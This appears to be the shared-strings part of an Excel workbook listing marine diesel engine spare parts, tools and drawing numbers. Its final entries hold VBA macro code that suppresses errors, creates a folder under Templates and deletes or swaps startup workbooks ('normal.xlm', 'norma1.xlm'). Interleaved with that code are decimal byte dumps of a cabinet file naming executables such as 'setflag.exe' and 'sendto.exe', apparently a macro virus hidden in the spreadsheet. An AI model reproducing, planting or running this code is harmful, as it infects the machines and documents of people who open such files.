    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING HOUSING FOR CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT SPUR GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER PIN ASSEMBLY FOR EXHAUST VALVE DRIVING GEAR LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REVERSING HANDLE FOR MANEUVERING HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REVERSING HANDLE LEVER FOR MANEUVERING HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT  MANEUVERRING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTER SHAFT FOR REVERSING HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FREE LEVER FOR FUEL CONTROL LINKAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINK BALLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUSH PIECE FOR F.O. CONTROL LINKAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FREE JOINT FOR FUEL CONTROL LINKAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEVEL GEAR FOR GOVERNOR DRIVING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISENGAGING FORK MACHINING DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET RIGGING CONN. PIPE OF CYL. COOLING WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TYPE 400 THREADED BALL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORIFICE OF AIR VENT MAIN PIPE OF CYLINDER COOLING WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>400TYPE SCREWED BALL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS (TAPER THREAD   NIPPLE)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE CONNECTION FOR A/C AIR SIDE WASHING WATER PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARINE BRONZE 16K   GLOBE VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING BRANCH PIPE OF FUEL OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NON-FLOW SWITCH FOR CYLINDER LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE FOR FO. INJECTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION FOR F.O. HIGH PRESS. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEAM TRACE PIPE OF DRAIN BRANCH PIPE OF FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET MAIN PIPE  FOR STARTING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR AUTOMATIC STARTING AIR STOP VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUPTURE DISK SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAME ARRESTER  FOR STARTING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKET WITH INNER &amp; OUTER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIGGING CONN. PIPE OF STARTING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL AIR PIPE OF STARTING AIR VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>卡套接头</t>
  </si>
  <si>
    <t>TERMINAL BOLTS FOR PIPE JOINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW TYPE FITTING FOR EXH. VALVE AIR SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINAL PIPE JOINTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL LEAK ALARM TANK ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Steam trace pipe of drain main pipe of f.o. pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE  FOR MOISTURE SEPARATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGING AIR TRUNK DRAIN PIPE
(CYLINDER UNDER SIDE DRAIN)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER UNDERSIDE DRAIN PIPE SQUARE GASKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOTTLE OF DRAIN SEPARATOR OF AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARINE BRONZE 5K   FLANGED COCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE CONNECTION ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NTN CONNECTOR TYPE THREADIN PIPE         FITTINGS WITH STRAIGHT THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOVERY PIPE ASSEMBLY FOR EXH. VALVE AIR SPRING DRAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR THROTTLE FOR SPRING AIR DRAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JOINT  FOR SPRING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE AIR VENT PIPE OF INLET MAIN PIPE 
OF EXH. VALVE DRIVING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE GOVERNOR DRIVING GEAR DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTING BOARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAT PLATE OF PRESSURE SWITCH STAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING PLATE 2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONDUIT FOR PISTON COOLING OIL TEMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUBBER PLATE B</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOFT LAGGING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLET PIECE FOR TURBOCHARGER EXHAUST GAS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING BOX ASSEMBLY FOR TIGHTING FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREE BOND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE HEAD WRENCH OPEN END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HAMMERING SPANNER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON WRENCH KEYS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHACKLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUSPENSION WELDING DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REMOV./ FITTING OF MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTING AND DISMANTLING DEVICE GUIDE RAIL ASSEMBLY (JIS)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAL DEPTH GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIDUCIAL GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRE-TENSIONER LOWER CONNECTING ROD BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DUST COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING TOOL FOR CHECKING CYLINDER LINER BORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FACING UP TOOL FOR CYLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WOOD SUPPORTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RING GROOVE MEASURING GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAPING SLEEVE 2-PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FALLING PREVENTION TOOL FOR PISTON SKIRT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE FOR SHARP OF THE PISTON HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACKING SCREW FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAP</t>
  </si>
  <si>
    <t>CROSSHEAD PIN BEARING EXTRACTION SCHEMATIC DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST DEVICE FOR FUEL INJECTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAKE OFF TOOL FOR FUEL INJECTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHUCK  FOR NOZZLE COOLING WIRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOZZLE GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY AND DISMANTLING DEVICE FOR GUIDE BUSH TO VALVE CAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OFFSETTING TOOL FOR EXPANSION JOINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERHAUL STAND FOR START AIR VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING TENSIONING TOOL FOR START AIR VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING TEST TOOL FOR STARTING AIR VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FACEING UP TOOL FOR STARTING AIR VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL FOUNDATION PRE-TENSIONER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF COVERS FOR TOOL TC FAILURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBINATION WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAPPING TOOL ASSEMBLY FOR SEALING SURFACES ON FUEL INJECTION PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT BAR RING</t>
  </si>
  <si>
    <t>DAAD900562</t>
  </si>
  <si>
    <t>HEAD CONE</t>
  </si>
  <si>
    <t>DAAD010998</t>
  </si>
  <si>
    <t>Fuel oil pipe welding procedure</t>
  </si>
  <si>
    <t>CAMSHAFT GEAR ASSEMBLY</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING OIL LINE</t>
  </si>
  <si>
    <t>DAAD081295</t>
  </si>
  <si>
    <t>DAAD012093</t>
  </si>
  <si>
    <t>FLOW OBSERVATION BOX</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS FUEL PUMP</t>
  </si>
  <si>
    <t>DAAD084071</t>
  </si>
  <si>
    <t>DAAD081369</t>
  </si>
  <si>
    <t>FILTER CARTRIDGE INSERT</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>Header (PCB mounted)</t>
  </si>
  <si>
    <t>3803170-1.0</t>
  </si>
  <si>
    <t>Inductor, General</t>
  </si>
  <si>
    <t>3802847-9.0</t>
  </si>
  <si>
    <t>Digital Memory PROM</t>
  </si>
  <si>
    <t>3803222-9.0</t>
  </si>
  <si>
    <t>Tranzorber</t>
  </si>
  <si>
    <t>3803223-0.0</t>
  </si>
  <si>
    <t>Diode, Zener</t>
  </si>
  <si>
    <t>3802376-9.1</t>
  </si>
  <si>
    <t>DIP Switch</t>
  </si>
  <si>
    <t>3804997-5.6</t>
  </si>
  <si>
    <t>1142738-0.5</t>
  </si>
  <si>
    <t>ESD Protective Bag</t>
  </si>
  <si>
    <t>3802486-0.0</t>
  </si>
  <si>
    <t>0950 PCBA</t>
  </si>
  <si>
    <t>1882434-0.3</t>
  </si>
  <si>
    <t>0910 PCBA</t>
  </si>
  <si>
    <t>1882294-8.5</t>
  </si>
  <si>
    <t>Misc.</t>
  </si>
  <si>
    <t>1882547-8.0</t>
  </si>
  <si>
    <t>1882096-0.1</t>
  </si>
  <si>
    <t>1883535-2.2</t>
  </si>
  <si>
    <t>ENGINE ROOM, SPACE REQUIREMENT</t>
  </si>
  <si>
    <t>5657106-2</t>
  </si>
  <si>
    <t>SHOPTRIAL AND SEATRIAL/SITETRIAL</t>
  </si>
  <si>
    <t>1896750-4</t>
  </si>
  <si>
    <t>OUTLINE DIMENSION MAIN TOOLS</t>
  </si>
  <si>
    <t>3167213-5</t>
  </si>
  <si>
    <t>BEDPLATE, BEARINGS</t>
  </si>
  <si>
    <t>5083680-6</t>
  </si>
  <si>
    <t>OIL THROW RING, UPPER</t>
  </si>
  <si>
    <t>5126130-1.3</t>
  </si>
  <si>
    <t>OIL THROW RING, LOWER</t>
  </si>
  <si>
    <t>5126132-5.3</t>
  </si>
  <si>
    <t>5150371-3.0</t>
  </si>
  <si>
    <t>GUIDE SHOE CAST</t>
  </si>
  <si>
    <t>5150372-5.0</t>
  </si>
  <si>
    <t>GUIDE SHOE AFT</t>
  </si>
  <si>
    <t>5150376-2.0</t>
  </si>
  <si>
    <t>STUD, W. LONG/SHORT THREA</t>
  </si>
  <si>
    <t>5427490-9.2</t>
  </si>
  <si>
    <t>QS FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>0742367-0.3</t>
  </si>
  <si>
    <t>1472-1420-0002.0</t>
  </si>
  <si>
    <t>ARR. OF OIL PIPE</t>
  </si>
  <si>
    <t>5343309-9.0</t>
  </si>
  <si>
    <t>TIMING UNIT COMPLETE</t>
  </si>
  <si>
    <t>5715627-3.2</t>
  </si>
  <si>
    <t>5715665-5.3</t>
  </si>
  <si>
    <t>ECS SOFTWARE PACKAGE</t>
  </si>
  <si>
    <t>INCOMPLETE_21-4730</t>
  </si>
  <si>
    <t>UMBRELLA, DRAIN PIPE</t>
  </si>
  <si>
    <t>5625589-0</t>
  </si>
  <si>
    <t>THREE-WAY COCKS W. HANDLE</t>
  </si>
  <si>
    <t>EN186J0032.0</t>
  </si>
  <si>
    <t>LUB. OIL PIPE-ACTUATOR</t>
  </si>
  <si>
    <t>5621002-1.1</t>
  </si>
  <si>
    <t>LUB. OIL INLET PIPE</t>
  </si>
  <si>
    <t>5470130-0.1</t>
  </si>
  <si>
    <t>HYDR. OIL PIPES, INLET - OUTLET</t>
  </si>
  <si>
    <t>5558727-1</t>
  </si>
  <si>
    <t>1710363-5.1</t>
  </si>
  <si>
    <t>1880162-0.2</t>
  </si>
  <si>
    <t>Production documentation</t>
  </si>
  <si>
    <t>3805689-0.0</t>
  </si>
  <si>
    <t>Product manual cover</t>
  </si>
  <si>
    <t>3805727-4.0</t>
  </si>
  <si>
    <t>CABLE RELIEF</t>
  </si>
  <si>
    <t>2270-0350 CYL. COVER LIFT</t>
  </si>
  <si>
    <t>2270-0350-0002.0</t>
  </si>
  <si>
    <t>WORKTABLE; EXH. VALVE, OPTIONAL</t>
  </si>
  <si>
    <t>1470-0300-0013.0</t>
  </si>
  <si>
    <t>RUBBER COVER, CROSSHEAD</t>
  </si>
  <si>
    <t>5102734-6.0</t>
  </si>
  <si>
    <t>PLATE(SHAPED), GALV.</t>
  </si>
  <si>
    <t>5102963-4.0</t>
  </si>
  <si>
    <t>5102697-4.0</t>
  </si>
  <si>
    <t>HEXAGON SCREWm</t>
  </si>
  <si>
    <t>EN61W30180.0</t>
  </si>
  <si>
    <t>CONE FOR SEALING RING</t>
  </si>
  <si>
    <t>5103683-5.0</t>
  </si>
  <si>
    <t>BIT,HEXAGON SOCKET SCREWS</t>
  </si>
  <si>
    <t>EN507B1.0</t>
  </si>
  <si>
    <t>7670-0450 PRESSURE GAUGE</t>
  </si>
  <si>
    <t>7670-0450-0001.0</t>
  </si>
  <si>
    <t>7670-0320 ROUNDSLINGS</t>
  </si>
  <si>
    <t>7670-0320-0001.0</t>
  </si>
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 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</si>
  <si>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Private Sub createcabfile()</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</si>
  <si>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</si>
  <si>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Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
